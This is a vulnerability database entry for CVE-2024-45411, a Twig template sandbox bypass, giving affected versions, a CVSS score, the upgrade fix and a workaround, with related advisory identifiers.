CVE-2024-45411

CVSS v3.1

8.6

High

Vector

AV:N/AC:L/PR:N/UI:N/S:C/C:N/I:H/A:N

Name of the Vulnerable Software and Affected Versions: Twig versions prior to 1.44.8 Twig versions prior to 2.16.1 Twig versions prior to 3.14.0

Description: Under some circumstances, the sandbox security checks are not run, which allows user-contributed templates to bypass the sandbox restrictions. This issue occurs when the sandbox is disabled globally, and a sandboxed include() function references a template name that has been loaded before in a non-sandbox context.

Recommendations: For versions prior to 1.44.8, update to version 1.44.8 or later. For versions prior to 2.16.1, update to version 2.16.1 or later. For versions prior to 3.14.0, update to version 3.14.0 or later. As a temporary workaround, consider enabling the sandbox security checks globally to prevent user-contributed templates from bypassing the sandbox restrictions.

Exploit

Fix

Protection Mechanism Failure

Found an issue in the description? Have something to add? Feel free to write us 👾

dbugs@ptsecurity.com

Weakness Enumeration

CWE-693

Related Identifiers

BDU:2025-06075

CVE-2024-45411

DLA-3888-1

DSA-5771-1

GHSA-6J75-5WFJ-GH66

USN-7456-1

USN-7549-1

Affected Products

Linuxmint

Red Os

Twig

Ubuntu

CVE-2024-45411

Weakness Enumeration

Related Identifiers

Affected Products

References · 42